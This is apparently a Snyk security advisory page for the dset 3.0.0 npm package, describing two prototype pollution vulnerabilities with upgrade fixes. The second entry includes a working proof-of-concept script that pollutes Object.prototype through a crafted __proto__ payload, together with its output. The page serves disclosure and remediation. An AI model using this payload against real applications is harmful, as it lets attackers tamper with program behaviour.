dset@3.0.0 vulnerabilities

A tiny (194B) utility for safely writing deep Object values~!

Direct Vulnerabilities

Known vulnerabilities in the dset package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Prototype Pollution

dset is an A tiny (161B) utility for safely writing deep Object values~!

Affected versions of this package are vulnerable to Prototype Pollution via the dset function due improper user input sanitization. This vulnerability allows the attacker to inject malicious object property using the built-in Object property __proto__, which is recursively assigned to all the objects in the program.

How to fix Prototype Pollution?

Upgrade dset to version 3.1.4 or higher.

<3.1.4
  • M
Prototype Pollution

dset is an A tiny (161B) utility for safely writing deep Object values~!

Affected versions of this package are vulnerable to Prototype Pollution via 'dset/merge' mode, as the dset function checks for prototype pollution by validating if the top-level path contains __proto__, constructor or protorype. By crafting a malicious object, it is possible to bypass this check and achieve prototype pollution.

PoC:

// poc.js contains:

const {dset} = require("dset/merge")

var a = {b:{c:1}}

console.log("a.polluted:",a.polluted)
console.log("{}.polluted:",({}).polluted)

dset(a,"b", JSON.parse('{"__proto__":{"polluted":"Yes!"}}') ) //Needs to craft payload with JSON.parse to keep the object key __proto__

console.log("a.polluted:",a.polluted)
console.log("{}.polluted:",({}).polluted)

// Running node poc.js give the output:

a.polluted: undefined
{}.polluted: undefined
a.polluted: Yes!
{}.polluted: Yes!

How to fix Prototype Pollution?

Upgrade dset to version 3.1.2 or higher.

<3.1.2